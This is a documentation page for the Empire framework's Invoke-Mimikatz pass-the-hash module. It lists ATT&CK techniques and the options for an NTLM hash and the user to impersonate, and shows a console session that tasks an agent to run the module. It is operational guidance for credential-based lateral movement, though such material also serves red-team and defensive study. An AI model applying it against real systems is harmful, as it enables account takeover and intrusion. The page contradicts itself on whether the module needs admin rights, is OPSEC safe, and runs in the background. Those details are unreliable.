Invoke-Mimikatz PTH - Empire Module


This page contains detailed information about how to use the powershell/credentials/mimikatz/pth Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Mimikatz PTH
Module: powershell/credentials/mimikatz/pth
Source code [1]: empire/server/modules/powershell/credentials/mimikatz/pth.yaml
Source code [2]: empire/server/modules/powershell/credentials/mimikatz/pth.py
MITRE ATT&CK: T1098, T1003, T1081, T1207, T1075, T1097, T1145, T1101, T1178, S0002
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: Yes

The pth module runs PowerSploit's Invoke-Mimikatz function to execute sekurlsa::pth to create a new process. with a specific user's hash. Use credentials/tokens to steal the token afterwards.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the pth module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the pth module:

Agent
Agent to run module on.

CredID
CredID from the store to use for ticket creation.

Additional Module Options


This is a list of additional options that are supported by the pth module:

domain
The fully qualified domain name.

ntlm
The NTLM hash to use.

user
Username to impersonate.

Pth Example Usage


Here's an example of how to use the pth module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/mimikatz/pth

 Author       @JosephBialek                                                        
              @gentilkiwi                                                          
 Background   True                                                                 
 Comments     http://clymb3r.wordpress.com/                                        
              http://blog.gentilkiwi.com                                           
              http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-   
              mimikatz/                                                            
 Description  Runs PowerSploit's Invoke-Mimikatz function to execute sekurlsa::pth 
              to create a new process. with a specific user's hash. Use            
              credentials/tokens to steal the token afterwards.                    
 Language     powershell                                                           
 Name         powershell/credentials/mimikatz/pth                                  
 NeedsAdmin   True                                                                 
 OpsecSafe    True                                                                 
 Software     http://attack.mitre.org/software/S0002                               
 Techniques   http://attack.mitre.org/techniques/T1098                             
              http://attack.mitre.org/techniques/T1003                             
              http://attack.mitre.org/techniques/T1081                             
              http://attack.mitre.org/techniques/T1207                             
              http://attack.mitre.org/techniques/T1075                             
              http://attack.mitre.org/techniques/T1097                             
              http://attack.mitre.org/techniques/T1145                             
              http://attack.mitre.org/techniques/T1101                             
              http://attack.mitre.org/techniques/T1178                             


,Record Options--,----------,----------------------------------,
| Name   | Value | Required | Description                      |
|--------|-------|----------|----------------------------------|
| Agent  |       | True     | Agent to run module on.          |
|--------|-------|----------|----------------------------------|
| CredID |       | True     | CredID from the store to use for |
|        |       |          | ticket creation.                 |
|--------|-------|----------|----------------------------------|
| domain |       | False    | The fully qualified domain name. |
|--------|-------|----------|----------------------------------|
| ntlm   |       | False    | The NTLM hash to use.            |
|--------|-------|----------|----------------------------------|
| user   |       | False    | Username to impersonate.         |
'--------'-------'----------'----------------------------------'

(Empire: usemodule/powershell/credentials/mimikatz/pth) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/mimikatz/pth) > set CredID value
[*] Set CredID to value
(Empire: usemodule/powershell/credentials/mimikatz/pth) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.